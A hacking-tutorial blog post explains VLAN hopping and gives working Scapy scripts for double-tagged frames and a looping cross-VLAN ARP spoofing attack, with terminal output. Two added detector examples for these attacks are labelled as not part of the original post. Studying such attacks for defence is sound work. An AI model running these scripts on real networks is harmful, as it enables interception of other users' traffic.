Code Your Own ARP Spoofing Over VLAN Hopping

Hacking Truth

 

 

VLAN


A VLAN (Virtual Local Area Network) separates several networks on a logical basis. Only devices on the same VLAN can see each other. VLANs were invented to define a network's structure independently of its physical hardware, to prioritize connections and to minimize broadcast traffic. They were not developed with security in mind, but it's a common myth that VLANs add to your security. Don't rely on this myth, because several ways exist to circumvent the separation of a VLAN.


Switches implement VLANs in two different ways: by tagging packets with an IEEE 802.1Q header (see the image below), which is inserted after the Ethernet header, or simply by port. 802.1Q is the newer variant, which allows the creation of a VLAN spread over several switches.






VLAN Hopping


As already mentioned, VLANs are not a security feature: the additional security of a modern, tagged VLAN depends on a header, added to the packet, that includes the VLAN ID. Such a packet can easily be created with Scapy. Let's say our computer is connected to VLAN 1 and wants to ping another one on VLAN 2.

 

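#!/usr/bin/env python3

from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

# Outer tag: our own VLAN (1); inner tag: the destination VLAN (2)
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
         Dot1Q(vlan=1) / \
         Dot1Q(vlan=2) / \
         IP(dst="192.168.13.23") / \
         ICMP()
sendp(packet)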

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan.py
.
Sent 1 packets.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan.py
.
Sent 1 packets.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$






First we put the header with our own VLAN tag into the packet and afterwards the one of the destination host. The switch will remove the first tag and then decide how to handle the packet; seeing the second tag with VLAN ID 2, it forwards the packet to that VLAN. On some switches this attack will only be successful if the switch is connected to other VLAN-enabled switches via stacking, because otherwise they use port-based VLANs.
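Seen from the monitoring side, the double-tagged frame described above is easy to recognise, because an end host on an access port has no reason to send stacked 802.1Q tags. The following is an added example, not part of the original post: it parses raw Ethernet frames with the standard library only and labels them. The sample frames, the placeholder source MAC and the `access_port` switch are constructed assumptions.

```python
import struct

TPIDS = {0x8100, 0x88A8}  # 802.1Q and 802.1ad tag protocol identifiers

def parse_vlan_tags(frame: bytes):
    """Return (vlan_ids, inner_ethertype) for a raw Ethernet frame."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    offset = 12                        # skip destination and source MAC
    vlan_ids = []
    (ethertype,) = struct.unpack_from("!H", frame, offset)
    while ethertype in TPIDS:
        if len(frame) < offset + 6:    # TPID + TCI + next EtherType
            raise ValueError("truncated 802.1Q tag")
        (tci,) = struct.unpack_from("!H", frame, offset + 2)
        vlan_ids.append(tci & 0x0FFF)  # low 12 bits of the TCI are the VLAN ID
        offset += 4
        (ethertype,) = struct.unpack_from("!H", frame, offset)
    return vlan_ids, ethertype

def classify(frame: bytes, access_port: bool = True) -> str:
    """Label a frame as a sensor on a switch port would (access_port is assumed)."""
    try:
        vlan_ids, _ = parse_vlan_tags(frame)
    except ValueError:
        return "malformed"
    if len(vlan_ids) >= 2:
        return "double-tagged %s" % "->".join(map(str, vlan_ids))
    if vlan_ids and access_port:
        return "tagged-on-access-port %d" % vlan_ids[0]
    return "ok"

def build(tags, ethertype=0x0800, payload=b"\x00" * 46):
    """Build a constructed sample frame; the source MAC is a placeholder."""
    hdr = bytes.fromhex("c0d3deadbeef") + bytes.fromhex("020000000001")
    for vid in tags:
        hdr += struct.pack("!HH", 0x8100, vid)
    return hdr + struct.pack("!H", ethertype) + payload

# Constructed samples: untagged, single tag, and the VLAN 1 -> VLAN 2 stack
SAMPLES = {"plain": build([]), "single": build([2]), "double": build([1, 2])}

if __name__ == "__main__":
    for name, frame in SAMPLES.items():
        print(name, "->", classify(frame))
```
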




Let’s Play Switch


Linux runs on a lot of embedded network devices; therefore it should not be surprising that one can turn their own computer into a full-featured VLAN switch thanks to Linux. All you need is the tool vconfig. After installing the required package for your distribution, you can add your host to another VLAN with the following command.

vconfig add wlan0 2


Afterwards you must remember to start the new device and give it an IP address of the VLAN network!

ifconfig wlan0.2 192.168.13.23 up



 

 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig                   


wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
        inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 63482  bytes 39443272 (37.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 58826  bytes 15548253 (14.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo vconfig add wlan0 2   

Warning: vconfig is deprecated and might be removed in the future, please migrate to ip(route2) as soon as possible!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo ifconfig wlan0.2 192.168.13.23 up  
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig                              


wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
        inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 64616  bytes 39837956 (37.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 60023  bytes 15811522 (15.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.13.23  netmask 255.255.255.0  broadcast 192.168.13.255
        inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9  bytes 726 (726.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$      



 

 


 




ARP Spoofing Over VLAN Hopping


VLANs limit broadcast traffic to the ports belonging to the same VLAN; therefore we cannot by default react to all ARP requests but have to proactively tell the victim our MAC every few seconds, as seen in the first ARP spoofing example. The code is identical except that we tag every packet for our own VLAN and then additionally for the destination VLAN.

 

#!/usr/bin/env python3

import time
from scapy.all import sendp, ARP, Ether, Dot1Q

iface = "wlan0"
target_ip = '192.168.13.23'
fake_ip = '192.168.13.5'
fake_mac = 'c0:d3:de:ad:be:ef'
our_vlan = 1
target_vlan = 2

# ARP reply (is-at) wrapped in two 802.1Q tags: our VLAN, then the target VLAN
packet = Ether() / \
         Dot1Q(vlan=our_vlan) / \
         Dot1Q(vlan=target_vlan) / \
         ARP(hwsrc=fake_mac,
             pdst=target_ip,
             psrc=fake_ip,
             op="is-at")

# Repeat the unsolicited reply every 10 seconds
while True:
    sendp(packet, iface=iface)
    time.sleep(10)
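Because the replies sent by this loop are never preceded by a request, a sensor on the target VLAN can spot them. The following is an added example, not part of the original post: it flags an IP address that is suddenly claimed by a second MAC and a sender that keeps answering without being asked. The event tuple layout, both thresholds and the `aa:aa:...` addresses are constructed assumptions.

```python
from collections import defaultdict

REQUEST_WINDOW = 2.0     # seconds a who-has counts as "answerable" (assumed)
UNSOLICITED_LIMIT = 3    # unrequested replies before alerting (assumed)

def detect_arp_spoofing(events):
    """events: iterable of (ts, op, sender_ip, sender_mac, target_ip) tuples."""
    last_request = {}                # requested IP -> time of the last who-has
    bindings = {}                    # IP -> first MAC seen claiming it
    conflicts = set()                # (IP, MAC) pairs already reported
    unsolicited = defaultdict(int)   # (IP, MAC) -> count of unrequested replies
    alerts = []
    for ts, op, sender_ip, sender_mac, target_ip in events:
        if op == "who-has":
            last_request[target_ip] = ts
            continue
        key = (sender_ip, sender_mac)
        known = bindings.setdefault(sender_ip, sender_mac)
        if known != sender_mac and key not in conflicts:
            conflicts.add(key)
            alerts.append((ts, "binding-conflict", sender_ip, known, sender_mac))
        asked = last_request.get(sender_ip)
        if asked is None or ts - asked > REQUEST_WINDOW:
            unsolicited[key] += 1
            if unsolicited[key] == UNSOLICITED_LIMIT:
                alerts.append((ts, "repeated-unsolicited-reply",
                               sender_ip, known, sender_mac))
    return alerts

# Constructed observations: the real owner of 192.168.13.5 answers one request,
# then a different MAC claims that IP every 10 seconds without being asked.
EVENTS = [
    (0.0, "who-has", "192.168.13.23", "aa:aa:aa:aa:aa:23", "192.168.13.5"),
    (0.1, "is-at", "192.168.13.5", "aa:aa:aa:aa:aa:05", "192.168.13.23"),
    (10.0, "is-at", "192.168.13.5", "c0:d3:de:ad:be:ef", "192.168.13.23"),
    (20.0, "is-at", "192.168.13.5", "c0:d3:de:ad:be:ef", "192.168.13.23"),
    (30.0, "is-at", "192.168.13.5", "c0:d3:de:ad:be:ef", "192.168.13.23"),
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(EVENTS):
        print(alert)
```
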


 

 

 
Luckily it's not that complicated to protect against these kinds of VLAN attacks: just use physically divided switches if you really want to separate your networks!


 

 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 vlan-hopping.py                                                                                                                                                    1 ⨯ 1 ⚙
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
^CTraceback (most recent call last):
  File "/home/hackerboy/Desktop/python/mymodule/vlan-hopping.py", line 20, in <module>
    time.sleep(10)
KeyboardInterrupt

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$

 

 

 

If you want to change the MAC address of the VLAN interface (such as wlan0.2), you can use this command:

sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77

  • wlan0.2 is our VLAN interface.


 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ ifconfig                                        

wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.13.23  netmask 255.255.255.0  broadcast 192.168.13.255
        inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23  bytes 1692 (1.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ 



 


I hope you liked this post; if you did, don't forget to share it.
Thank you so much :-)

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. We do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
 


 
